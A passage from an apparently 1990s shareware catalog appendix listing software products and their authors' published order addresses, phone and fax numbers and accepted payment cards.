Optima, Visa + Fax: (0772)-324353 + Queries: (0772)-324353 + + Appendix A, "Author addresses" 752 + + + + Products: THE FEELING'S MUTUAL-WINDOWS, THE FEELING'S MUTUAL- + WINDOWS, THE FEELING'S MUTUAL-WINDOWS + Author: Interpretive Software Inc. [Stu James] + Address: 1932 Arlington Blvd, Suites 107-109, Charlottesville, + VA 22903 + Orders: 800-746-8587 (orders only, please) + Accepts: MasterCard, Visa + Fax: 804-979-2454 + Queries: 804-979-0245 + + Products: Word Rescue #1, Word Rescue #1, Word Rescue #1 + Author: Redwood Games + Address: P.O. Box 892, Mendocino, CA 95460 + Orders & queries: 707-937-3320 + + Product: Above & Beyond + Author: 1Soft Corp. + Address: PO Box 1320, Middletown, CA 95461 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 707-987-3150 + Queries: 707-987-0256 + + Product: QRead + Author: DS Products [Daniel Scavezze] + Address: P.O. Box 342, Westford, MA 01886 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Queries: 508-250-1351 + + Products: XMENU, XMENU + Author: David M. Dibble + Address: 5388 Dahlia Lane, Riverside, CA 92507 + + Products: A Project/Event Planner, A Project/Event Planner + Author: Sapphire Software Inc. + Address: 6650 Hawaii Kai Drive, Suite 219, Honolulu, HI 96825 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 808-395-5587 + + Appendix A, "Author addresses" 753 + + + + Product: ZIPPER Payroll + Author: SOFTCRAFT [Ed Protas] + nd + Address: 3612 122 Place SE, Everett, WA 98208 + Orders & queries: 206-728-8427 + Fax: 206-337-1842 + + Products: QuickTax (tm) Planner/Estimator, QuickTax (tm) + Planner/Estimator + Author: Bates Engineering/Software + Address: 2742 Swansboro Road, Placerville, CA 95667 + Orders & queries: 916-622-1886 + Fax: 916-622-1886 + + Product: HortMan + Author: Sunrise Software + Address: 4821 Clydelle Ave., San Jose, CA 95124 + Queries: 408-377-0703 + + Product: Treasure Hunt Math + Author: Adventure LearningWare + Address: 5667 Snell Ave. #236, San Jose, CA 95123 + Orders: 800-829-5519 (orders only, please) + Fax: 408-224-4455 + Queries: 408-224-5519 + + Product: ColorDOS + Author: KroTek Electronics + Address: 1214 Riverside Dr., Unit 317, Timmins, Ontario P4R + 1A4 CANADA + Orders & queries: 705-268-7352 + + Product: Track-It + Author: Millennium Software + Address: PO Box 2209, Dublin, CA 94568 + Orders & queries: 510-828-5892 + Accepts: MasterCard, Visa + + Product: Judy's TenKey + Author: Judy's Applications [Daniel E. Stickel] + Address: 2464 El Camino Real, Suite #125, Santa Clara, CA + 95051 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 408-244-0744 + + Products: Oil Baron, Oil Baron, Oil Baron + Author: Al Funk + Address: 42 Parkwyn Dr., Delmar, NY 12054 + + Appendix A, "Author addresses" 754 + + + + Product: TimeCapture + Author: Versatile Software Solutions, Inc. + Address: PO Box 147, Fairborn, OH 45324 + Orders: 800-242-4775 (orders only, please) + Accepts: + Queries: 513-878-0315 + + Product: CodeLister + Author: Malcolm D. McDowell + Address: 85 Halley St., Nepean, Ontario K2J 3R5 CANADA + Orders & queries: 613-825-8593 + + Products: WinUpD8R, WinUpD8R, WinUpD8R, WinUpD8R, WinUpD8R + Author: Open Windows [Richard W. Bryant] + Address: PO Box 49746, Colorado Springs, CO 80949-9746 + Orders: 800-531-0403 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 800-531-0403 + Queries: 719-531-0403 + + Products: The Letterhead Kit/Win, The Letterhead Kit/Win, The + Letterhead Kit/Win, The Letterhead Kit/Win, The Letterhead Kit/ + Win, The Letterhead Kit/Win + Author: Science Translations Software Services [Jerry Stern] + Address: PO Box 20234, Baltimore, MD 21284-0234 + Orders & queries: 410-661-2224 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 410-661-2224 + + Products: WinProof, WinProof + Author: Intellect Systems + Address: P.O. Box 58213, Renton, WA 98058 + Orders & queries: 206-226-0429 + + Product: From Scratch recipe processor + Author: Desktop Solutions [Frank Imburgio] + Address: 26 Cecily Lane, Commack, NY 11725 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 516-493-3422 + Queries: 516-493-3422 + + Products: VB-Dial, VB-Dial + Author: Unique Software Productions + Address: Box 1337, Bellflower, CA 90706 + Orders & queries: 310-866-1932 + + Product: Portfolio Manager + Author: Shane Software International [Steven C. Hane] + th + Address: 107 17 Court, Sequim, WA 98382-9350 + Orders: 800-742-6303 (orders only, please) + Accepts: MasterCard, Visa + Queries: 206-681-2402 + + Appendix A, "Author addresses" 755 + + + + Product: Grocery Manager for Windows + Author: Absolute Value Software + Address: 4325 SW Stoddard Dr., Aloha, OR 97007 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Hebrew Edit + Author: Right to Left Software + Address: 3332 Yonge Street, #94034, Toronto Ont. M4N-3R1 + CANADA + Orders & queries: 416-489-7440 + Fax: 416-489-6654 + + Products: PC-Vault Plus, PC-Vault Plus + Author: Johnson Computer Systems, Inc. + Address: 20 Dinwiddie Place, Newport News, VA 23602 + Orders & queries: 804-872-9583 + Accepts: MasterCard, Visa + Fax: 804-874-8090 + + Products: RTAG, RTAG, RTAG + Author: Phillip H. Sherrod + Address: 4410 Gerald Place, Nashville, TN 37205-3806 + Orders & queries: 615-292-2881 + + Product: Fixed Asset Pro + Author: HammerSoft, Inc. + Address: P.O. Box 205, Kansas, OH 44841 + Orders & queries: 419-986-6007 + Accepts: MasterCard, Visa + Fax: 419-986-6007 + + Products: TMC Calendar & Phone Book, TMC Calendar & Phone Book, + TMC Calendar & Phone Book + Author: Specific Applications Software [Timothy W. Carlson] + Address: P.O. Box 6146, Minneapolis, MN 55406-0146 + Orders: 800-242-4775 (orders only, please) + Queries: 612-722-9659 + + Products: ROLLCALL.DBMS, ROLLCALL.DBMS, ROLLCALL.DBMS, + ROLLCALL.DBMS, ROLLCALL.DBMS, ROLLCALL.DBMS, ROLLCALL.DBMS, + ROLLCALL.DBMS + Author: PC-DSD + Address: P.O.Box 57621, Los Angeles, CA 90057 + Orders: 800-242-4775 (orders only, please) + Fax: 213-388-1481 + Queries: 800-427-8123 + + Appendix A, "Author addresses" 756 + + + + Product: Edwin Basic Math Add/Subtract + Author: Edwin Educational Software + Address: 717 E. Jericho Turnpike, Suite 105, Huntington + Station, NY 11746 + Orders & queries: 516-423-3817 + + Product: NETWORK QUOTABLES + Author: Greg Bixby + Address: 29550 Highmeadow, Farmington Hills, MI 48334 + Orders & queries: 313-737-9406 + + Product: DR. FORM + Author: IrwinWare [Russ Irwin] + Address: 113 Beechmont Ave., Pittsburgh, PA 15229 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 412-931-8442 + Queries: 412-931-9577 + + Products: PUBLIC ACCESS(tm), PUBLIC ACCESS(tm) + Author: IN/QUEST, LLC [Jim Turner] + Address: 3140 South Peoria St, K-200, Aurora, CO 80014-3155 + Orders & queries: 303-671-0800 + Accepts: MasterCard, Visa + Fax: 303-688-0188 + + Product: Bingo Text Editor + Author: Sunderland Software + Address: PO Box 2563, Columbia, MD 21045 + Orders & queries: 410-379-9019 + Accepts: MasterCard, Visa + + Product: Power + Author: Byte O'Software + Address: P.O. Box 283, Sterling, VA 20167 + Orders: 800-242-4775 (orders only, please) + Fax: 713-524-6398 + + Products: Vending Machine, Vending Machine, Vending Machine, + Vending Machine, Vending Machine + Author: Lincoln Beach Software [Harold Holmes] + Address: PO Box 1554, Ballwin, MO 63022-1554 + Orders: 800-242-4775 (orders only, please) + Accepts: MasterCard, Visa + Fax: 314-861-1500 + Queries: 314-861-1500 + + Product: Home Plan + Author: Home Plan [Chuck Herndon] + Address: 6890 Rimrock Valley Rd., Mountain Ranch, CA 95246 + Orders: 800-671-7526 (orders only, please) + Accepts: MasterCard, Visa + Fax: 209-754-3737 + Queries: 209-754-4891 + + Appendix A, "Author addresses" 757 + + + + Products: MATH CHALLENGE, MATH CHALLENGE + Author: Just For Me Software, Inc. + Address: P.O. Box 531, Novi, MI 48376 + Queries: 810-348-6697 + + Product: BCM Menu System + Author: BCM Software [Brad May] + Address: P.O.Box 267, Taylor, MI 48180-0267 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 313-292-6097 + + Products: KAPIAN : Chinese Flash Cards, KAPIAN : Chinese Flash + Cards + Author: Selfhelp Software [Phil Mosier] + Address: 2728 Bridgeford Drive, Sacramento, CA 95833 + Orders & queries: 916-927-2602 + + Products: Thelma's SpellPlus, Thelma's SpellPlus, Thelma's + SpellPlus + Author: Timpanogos Software [Douglas Campbell] + Address: 758 East 100 North, Orem, UT 84057-4910 + Orders & queries: 801-223-9055 + Accepts: MasterCard, Visa + Fax: 801-225-5212 + + Product: Daily Log Book + Author: Sequential Software, Inc. [John Haynes] + Address: P.O. Box 53, Somerset, KY 42502-0053 + Orders & queries: 606-423-5454 + Accepts: MasterCard, Visa + + Product: Pulsar for Windows + Author: Tesserax Information Systems + Address: 18022 Starmont Lane, Huntington Beach, CA 92649-4845 + Orders & queries: 714-840-8822 + Fax: 714-840-8822 + + Product: XYSee + Author: Insight Advantage + Address: 4509 Yellowleaf Dr., Fort Worth, TX 76133 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 817-346-9116 + + Appendix A, "Author addresses" 758 + + + + Products: ProWindows LITE for QuickBASIC, ProWindows LITE for + QuickBASIC + Author: DSE Software Publishing + Address: Post Office Box 96 + Orders & queries: 707-459-4358 + Accepts: MasterCard, Visa + + Products: Teleshare/DOS Remote Access, Teleshare/DOS Remote + Access, Teleshare/DOS Remote Access, Teleshare/DOS Remote + Access + Author: P. C. Softsmith [Vic Williams] + Address: 606 6455 Willingdon Ave, Burnaby, BC, V5H 4E4 CANADA + Orders & queries: 604-433-5189 + + Product: CODE-A-LINE + Author: Optimax Corporation + Address: P.O. Box 25447, Chicago, IL 60625-9998 + Fax: 312-561-6363 + Queries: 312-561-6363 + + Product: QBALL + Author: Benjamin W. Hartley + Address: Forest Park Estates #103, Jaffrey, NH 03452 + + Products: STEENBURGH's STUFF, STEENBURGH's STUFF, STEENBURGH's + STUFF, STEENBURGH's STUFF, STEENBURGH's STUFF + Author: Tay-Jee Software [Chuck Steenburgh] + Address: P.O. Box 835, Lexington, VA 24450 + Fax: 703-261-7023 + Queries: 703-261-7023 + + Products: WatchDog, WatchDog + Author: Software & Consulting [Ernest Vogelsinger] + Address: A-1130 Vienna, Hietzinger Hauptstrasse 40 c, AUSTRIA + Orders & queries: +43-1-876-46-090 + Accepts: MasterCard, Visa + Fax: +43-1-876-46-094 + + Products: PC-Fortune, PC-Fortune, PC-Fortune, PC-Fortune + Author: JAYAR Systems + Address: 253 College Street, Suite 263, Toronto, Ontario, + CANADA M5T 1R5 + Accepts: MasterCard, Visa + Queries: 416-751-5678 + + Product: DiskMan for Windows + Author: Diskmaster Software + Address: 8506 Timber Hill Court, Ellicott City, MD 21043 + Orders: 800-242-4775 (orders only, please) + Accepts: MasterCard, Visa + Queries: 410-418-8825 + + Appendix A, "Author addresses" 759 + + + + Products: O.R.B.Y., O.R.B.Y., O.R.B.Y. + Author: Able Art Software [Al Walters] + Address: P.O. Box 964, Nelson, B.C. V1L 6A5 CANADA + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 604-229-4766 + + Product: EnVision Publisher + Author: Software Vision Corporation + Address: P.O. Box 1734, Pinellas Park, FL 34664-1734 + Orders: 800-388-8474 (orders only, please) + Queries: 813-545-4354 + + Products: SpeedBack, SpeedBack, SpeedBack + Author: MicroTools Inc [Robert J. Japenga] + Address: 714 Hopmeadow St, Suite 14, PO Box 624, Simsbury, CT + 06070 + Orders & queries: 203-651-6170 + Accepts: MasterCard, Visa + Fax: 203-651-0019 + + Product: Code.Print for Visual Basic + Author: Caladonia Systems, inc. + Address: PO Box 1954, Tacoma, WA 98401-1954 + Orders: 206-729-2325 (orders only, please) + Accepts: MasterCard, Visa + Fax: 206-759-2342 + Queries: 206-759-2325 + + Products: WinNET Mail for MS Windows, WinNET Mail for MS + Windows + Author: COMPUTER WITCHCRAFT, INC. + Address: 330F Distillery Commons, Louisville, KY 40206 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 502-589-7300 + Queries: 502-589-6800 + + Products: QENV, QENV + Author: Annette Cuomo + Address: 3751 Durango St., Chino, CA 91710 + Orders & queries: 909-591-4956 + + Product: SCBA Trak + Author: Raymond A.J. Pesek + Address: 4706 Cottonwood Lane, Brunswick, OH 44212-2412 + Queries: 216-225-0248 + + Product: BIBLOGIC + Author: Biblogic Computer Services [Steve Champion] + Address: PO Box 1424, Thousand Oaks, CA 91358-0424 + Fax: 805-493-0364 + + Appendix A, "Author addresses" 760 + + + + Products: Marnav, Marnav, Marnav + Author: C & E Associates [Edward J. Panner] + Address: 119 Placid Drive, Fort Myers, FL 33919 + Orders: 813-482-5863 (orders only, please) + + Products: RR, RR, RR, RR, RR, RR, RR + Author: Feico Nater Shareware + Address: Beukweg 24, 7556 DE Hengelo Ov, NETHERLAND + Orders & queries: 31-74-438373 + Fax: 31-74-438373 + + Product: ToolBOX + Author: The Binary Toolshed [Roy Anderson] + Address: 388 Deerview Drive SE, Calgary, Alberta T2J 5Y2 + CANADA + Orders & queries: 403-225-2663 + Accepts: MasterCard, Visa + Fax: 403-271-5732 + + Products: WALL STREET RAIDER, WALL STREET RAIDER + Author: RONIN Software + Address: 3020 Issaquah-Pine Lake Rd. S.E., Suite #36, Issaquah, + WA 98027-7255 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 206-391-4036 + + Appendix A, "Author addresses" 761 + + + + Product: Wssindex + Author: WSS Division of DDC [Robert W. Babcock] + Address: 4 Reeves Road, Bedford, MA 01730 + Orders & queries: 617-275-1183 + Accepts: MasterCard, Visa + + Product: Chartist(tm) + Author: Novagraph, Inc. + Address: PO Box 850115, Richardson, TX 75085 + Orders & queries: 214-231-2169 + Accepts: MasterCard, Visa + Fax: 214-235-0607 + + Products: RESTAURANT COST CONTROL, RESTAURANT COST CONTROL, + RESTAURANT COST CONTROL + Author: First Step Software [Larry Larsen] + Address: 4839 Burlington, Boise, ID 83704 + Orders & queries: 208-376-4411 + Accepts: MasterCard, Visa + Fax: 208-376-4411 + + Products: TASK MASTER, TASK MASTER, TASK MASTER + Author: RKS Software, Inc. [Robert K. Summers] + Address: 3820 N. Dittmar Road, Arlington, VA 22207-4565 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 703-534-4358 + Queries: 703-534-1726 + + Products: PocketD Plus, PocketD Plus + Author: PocketWare [Jeff Rollason] + Address: Box 2369, Hendon, London, NW4 1NR ENGLAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: +44-81-203-3731 + + Products: ULTIMATE GIN, ULTIMATE GIN, ULTIMATE GIN, ULTIMATE + GIN + Author: Accidental Software + Address: 13245 Skiomah Rd., Apple Valley, CA 92308 + Orders & queries: 619-247-2804 + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: SkyGlobe, SkyGlobe + Author: KlassM Software, Inc. + Address: PO BOX 1067, Ann Arbor, MI 48106 + Orders: 800-968-4994 (orders only, please) + Accepts: MasterCard, Visa + Fax: 313-426-5533 + + Appendix A, "Author addresses" 762 + + + + Product: Vehicle Costs + Author: Graham Ferguson + Address: 3 Cristata Ave, Endeavour Hills, Vic. 3802 AUSTRALIA + Orders & queries: +61-3-700-3764 + + Products: SNAKE, SNAKE, SNAKE, SNAKE, SNAKE + Author: Chatfield Software, Inc. [Hale Chatfield] + Address: P.O. Box 115, Hiram, OH 44234-0115 + Orders: 800-645-8806 (orders only, please) + Accepts: MasterCard, Visa + Fax: 216-569-5449 + Queries: 216-632-5447 + + Product: GradeBook for Windows + Author: R&R EdWare [Russell Stevens] + Address: 5191 Pine Grove Dr., Spruce, MI 48762 + Orders: 800-727-2065 (orders only, please) + Accepts: MasterCard, Visa + Queries: 517-727-2066 + + Product: Snooper + Author: Vias and Associates + Address: PO Box 470805, San Francisco, CA 94147-0805 + Orders: 800-332-8234 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 415-922-3197 + Queries: 415-921-6262 + + Product: 4FILES + Author: Hand-Crafted Software [Larry T. Edwards] + Address: Box 6001, Sitka, AK 99835 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 907-747-4801 + Queries: 907-747-8996 + + Products: Textshot, Textshot + Author: McAdams Associates [Craig McAdams] + Address: P.O. Box 835505, Richardson, TX 75083-5505 + Queries: 214-239-9646 + + Products: TRAINER, TRAINER + Author: Nine-Patch Software [Richard A. Hart, PhD] + Address: 315 South Alco Avenue, Maryville, MO 64468-2033 + Orders & queries: 816-582-8589 + + Products: PS-SLEEVE, PS-SLEEVE, PS-SLEEVE, PS-SLEEVE, PS-SLEEVE + Author: JMJ Software + Address: 5000 Valley Stream Road, Charlotte, NC 28209 + Orders & queries: 704-525-1472 + + Products: PCX2PCL, PCX2PCL, PCX2PCL, PCX2PCL + Author: TAXWARE [Neil W. Taylor] + Address: PO Box 2014, Provo, UT 84603-2014 + + Appendix A, "Author addresses" 763 + + + + Products: NeMenu, NeMenu + Author: Just-In-Time Computing Services [John C. Skurka] + Address: P.O. Box 4166 + Orders & queries: 607-539-6609 + Accepts: + Fax: 607-539-6609 + + Product: Super Stuff Utilities + Author: Super Tools [Joseph A. Herrera] + Address: P.O. Box 866125, Plano, TX 75086-6125 + Queries: 817-382-7585 + + Product: CALC_JNC + Author: James N. Cox + Address: 418 Erie Avenue, Quakertown, PA 18951-1309 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 215-538-7363 + + Product: SAFEPACK + Author: D J Harvey Software + Address: PO Box 14, Cardiff CF4 6XW, UNITED KINGDOM + Accepts: MasterCard, Visa + Fax: +44-222-743029 + + Product: GammaCAD + Author: Gamma Software + Address: P.O. Box 8191, Fort Collins, CO 80526 + Orders: 800-747-9960 (orders only, please) + Accepts: MasterCard, Visa + Fax: 303-490-2928 + Queries: 303-490-2928 + + Products: Cumberland Story, Cumberland Story, Cumberland Story + Author: Cumberland Family Software [Ira J. Lund] + Address: 385 Idaho Springs Road, Clarksville, TN 37043 + Orders & queries: 615-647-4012 + Accepts: MasterCard, Visa + + Products: PC-TRACK, PC-TRACK, PC-TRACK + Author: Acme Workshops + Address: 9920 S. Palmer Rd., New Carlisle, OH 45344 + Queries: 513-878-6030 + + Products: RideMatch, RideMatch + Author: Paradise Programming [Chris M. Davies] + th + Address: 3805 85 Ave N.W., Olympia, WA 98502 + Queries: 206-866-3781 + + Products: NAMEBASE, NAMEBASE + Author: Elk Creek Software [Michael J. Paulick] + Address: PO Box 935, Conifer, CO 80433-0935 + Orders: 800-242-4775 (orders only, please) + + Appendix A, "Author addresses" 764 + + + + Product: Tolman Dental Program + Author: Peter T. Smith D.D.S. + Address: 455 Neighborhood Rd. + Orders & queries: 516-281-5544 + + Product: PrintEnvelope + Author: Maurer Associates [T. Scott Maurer] + Address: 7324 Native Oak Drive, Irving, TX 75063-8405 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 214-506-0670 + Queries: 214-432-0700 + + Products: HandyDOS, HandyDOS, HandyDOS, HandyDOS, HandyDOS + Author: Abri Technologies, Inc. + Address: HC 62, Box 100K, Great Cacapon, WV 25422 + Orders: 304-947-7129 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 304-947-7628 + + Products: Enigmacross, Enigmacross, Enigmacross + Author: CROSSDOWN [Sam Bellotto Jr.] + Address: 133 Akron St., Rochester, NY 14609-7618 + Orders & queries: 716-482-8092 + + Product: ClipMate for Windows + Author: Thornton Software Solutions + Address: P.O. Box 26263, Rochester, NY 14626 + Orders & queries: 716-227-6505 + Accepts: MasterCard, Visa + Fax: 716-227-1145 + + Product: CD-ROM Guide + Author: Save the Planet Software [Roger & Kathy Cox] + Address: P.O. Box 45, Pitkin, CO 81241 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 303-641-5035 + + Products: WinCharging, WinCharging, WinCharging, WinCharging, + WinCharging, WinCharging, WinCharging, WinCharging + Author: My Little Realm Enterprises + Address: 22 Church Street #103, Suite 376, Ramsey, NJ 07446 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 201-529-8318 + + Appendix A, "Author addresses" 765 + + + + Product: XED + Author: David L. Dight + Address: P.O. Box 280, Kings Cross, New South Wales 2011 + AUSTRALIA + Orders & queries: +61-2-3314521 + Accepts: + Fax: +61-2-2339393 + + Products: Me & My Metabolism, Me & My Metabolism, Me & My + Metabolism + Author: MoonStone Software + Address: 6 Herrada Road, Santa Fe, NM 87505 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 505-982-7251 + + Product: METRIC-X + Author: Orion Development Corporation [Richard Long] + Address: P. O. Box 2323, Merrifield, VA 22116-2323 + Orders: 800-992-8170 (orders only, please) + Fax: 703-802-0089 + Queries: 703-802-0088 + + Product: PixFolio Image Catalog System + Author: ACK Software [Allen C. Kempe] + Address: 298 W. Audubon Drive, Shepherdsville, KY 40165-8836 + Orders & queries: 502-955-7527 + Fax: 502-580-8980 + + Products: Jewel Thief, Jewel Thief + Author: ServantWare [Paul Ligeski] + Address: 1689 Sheffield, Ypsilanti, MI 48198 + Orders: 800-444-5457 (orders only, please) + Accepts: MasterCard, Visa + Fax: 317-286-3182 + + Products: On This Day for Windows, On This Day for Windows, On + This Day for Windows + Author: The Software Construction Co. + Address: PO Box 160, North Billerica, MA 01862-0160 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 508-851-6204 + + Appendix A, "Author addresses" 766 + + + + Product: PC Chart + Author: Guru Systems Ltd. [Gene Quong] + Address: 3873 Airport Way, Box 9754, Bellingham, WA 98227 + Orders & queries: 604-299-1010 + Accepts: MasterCard, Visa + Fax: 604-299-1099 + + Products: TROOP TRACKER, TROOP TRACKER, TROOP TRACKER, TROOP + TRACKER, TROOP TRACKER, TROOP TRACKER, TROOP TRACKER, TROOP + TRACKER, TROOP TRACKER + Author: Robert Barrentine Consulting + Address: 3211/2 Gorman Avenue, Laurel, MD 20707-4707 + Orders: 800-242-4775 (orders only, please) + Fax: 301-490-4168 + Queries: 301-490-7104 + + Product: DEXTER Text Editor + Author: FAGERLUND CONSULTING + Address: Lonsdale West Postal Outlet, Box 54053, North + Vancouver, B.C., CANADA, V7M 3L5 + Orders & queries: 604-984-7330 + Accepts: MasterCard, Visa + + Product: Lotto Thunder (PICK-6 Version) + Author: Charles P.Staats + Address: P.O. Box 29151, Brooklyn Center, MN 55429 + + Product: MAPIT + Author: Allison Software [John B. Allison] + Address: 166 Shady Lane, Apollo, PA 15613 + Orders & queries: 412-727-2198 + Accepts: MasterCard, Visa + + Products: $mart Gambler, $mart Gambler + Author: PC Information Systems [Roy Schoenbeck] + Address: 310 Rue de La Lavanda, Sparks, NV 89434-9524 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 702-342-0376 + + Products: Sloop Manager, Sloop Manager, Sloop Manager, Sloop + Manager + Author: Sloop Software + Address: 6457 Mesedge Lane, Colorado Springs, CO 80919 + Fax: 719-260-0433 + Queries: 719-260-0433 + + Appendix A, "Author addresses" 767 + + + + Product: CMFiler + Author: NoVaSoft + Address: 3239 Riverview Dr., Triangle, VA 22172 + Orders & queries: 703-221-1833 + + Products: WinEdit Standard, WinEdit Standard, WinEdit Standard, + WinEdit Standard, WinEdit Standard, WinEdit Standard, WinEdit + Standard, WinEdit Standard, WinEdit Standard + Author: Wilson WindowWare, Inc. [Morrie Wilson] + Address: Suite 212, 2701 California Ave. SW, Seattle, WA 98116 + Orders: 800-762-8383 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 206-935-7129 + Queries: 206-938-1740 + + Products: XPENS, XPENS + Author: Richard A. Williams + Address: P.O. Box 1311, Crystal Lake, IL 60039 + Orders: 800-2424-PSL (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 815-455-6333 + + Products: Your ESP Test, Your ESP Test, Your ESP Test, Your ESP + Test, Your ESP Test, Your ESP Test, Your ESP Test, Your ESP + Test, Your ESP Test, Your ESP Test, Your ESP Test, Your ESP + Test, Your ESP Test, Your ESP Test, Your ESP Test, Your ESP + Test, Your ESP Test, Your ESP Test, Your ESP Test, Your ESP + Test, Your ESP Test, Your ESP Test + Author: R.K. West Consulting [Rosemary K. West] + Address: P.O. Box 8059, Mission Hills, CA 91346 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 818-366-1737 + + Products: XDIR, XDIR, XDIR, XDIR + Author: XD Systems [Iram J. Weinstein] + Address: 1014 Shipman Lane, McLean, VA 22101 + Orders & queries: 703-821-3215 + + Product: SwimBase + Author: Words to Go + Address: 2710 Apple Way, Dunkirk, MD 20754 + Orders & queries: 301-855-6427 + + Products: PC-ECAP, PC-ECAP + Author: Circuit Systems + Address: 418 Church Road, Sicklerville, NJ 08081-1727 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 609-875-5433 + + Appendix A, "Author addresses" 768 + + + + Products: Professional Capture Systems, Professional Capture + Systems, Professional Capture Systems, Professional Capture + Systems + Author: JASC, Inc. + Address: PO Box 44997, Eden Prairie, MN 55344 + Orders: 800-622-2793 (orders only, please) + Accepts: MasterCard, Visa + Fax: 612-930-9172 + Queries: 612-930-9171 + + Products: Video Librarian, Video Librarian, Video Librarian, + Video Librarian + Author: TurboSystemsCo [Lemuel D. Turner] + Address: P.O. Box 965368, Marietta, GA 30066 + Orders: 800-257-7221 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 404-591-4988 + Queries: 404-516-8575 + + Products: OMS (Organizational Mgmt System, OMS (Organizational + Mgmt System + Author: Torbert Data Systems, Inc. + Address: P.O. Box 9218, Chesapeake, VA 23321 + Orders & queries: 804-488-5506 + Accepts: MasterCard, Visa + Fax: 804-488-8630 + + Products: ZiPaper, ZiPaper, ZiPaper, ZiPaper + Author: Daniel Thomas + Address: 2301 North Huron Circle, Placentia, CA 92670 + Queries: 714-524-5625 + + Products: dtSearch for Windows, dtSearch for Windows + Author: DT Software, Inc. + Address: 2101 Crystal Plaza Arcade, Suite 231, Arlington, VA + 22202 + Orders: 800-788-0787 (orders only, please) + Accepts: + Fax: 314-966-1833 + Queries: 703-521-9427 + + Products: MAZE3, MAZE3 + Author: Stiller Research [Wolfgang Stiller] + Address: 2625 Ridgeway St., Tallahassee, FL 32310 + Orders: 800-788-0787 (orders only, please) + Accepts: MasterCard, Visa + Fax: 904-575-7884 + Queries: 904-574-0920 + + Appendix A, "Author addresses" 769 + + + + Product: Brother's Keeper + Author: John Steed + Address: 6907 Childsdale, Rockford, MI 49341 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 616-866-3345 + + Product: CashMaster + Author: Contractor Information Systems, Inc. [Seymour Halpern + and Tom Sollas, III] + Address: P O Box 1028, Toms River, NJ 08754-1028 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 908-288-1504 + Queries: 908-288-1502 + + Products: Volcano Hunter, Volcano Hunter, Volcano Hunter, + Volcano Hunter + Author: Informative Technologies + Address: 1718 M Street NW, Suite 292, Washington, DC, + 20036-4504 + Orders: 800-2424-PSL (orders only, please) + Fax: 202-676-4529 + Queries: 202-675-4528 + + Product: Recon + Author: Amdox Corp. [Orest Skrypuch] + Address: 217 Terrace Hill St., Brantford, ON N3R 1G8 CANADA + Orders: 519-752-5453 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 519-753-7867 + + Products: WDiff, WDiff, WDiff, WDiff + Author: C.Sitte Softwaretechnik [Chris Sitte] + Address: A-5322 Hof 320, AUSTRIA + Accepts: American Express, MasterCard, Optima, Visa + + Products: TUTOR.COM, TUTOR.COM, TUTOR.COM + Author: Computer Knowledge + Address: PO Box 91176, Los Angeles, CA 90009-1176 + + Products: STACKEY, STACKEY + Author: CTRLALT Associates + Address: Suite 133, 260 South Lake Ave., Pasadena, CA 91101 + Orders: 800-788-0787 (orders only, please) + Fax: 314-966-1833 + + Product: EDDY (EDit DirectorY) + Author: ScofWare Associates [John Scofield] + th + Address: 117 W. Harrison Bldg., 6 floor, Suite S-678, + Chicago, IL 60605 + Accepts: + + Appendix A, "Author addresses" 770 + + + + Product: BakupWiz + Author: PCX + Address: 3525 Del Mar Heights Rd, Ste 313, San Diego, CA 92130 + Orders & queries: 619-259-9797 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 619-481-6474 + + Product: PC-FOOD II FOOD COSTING + Author: SCHRECK SOFTWARE + Address: 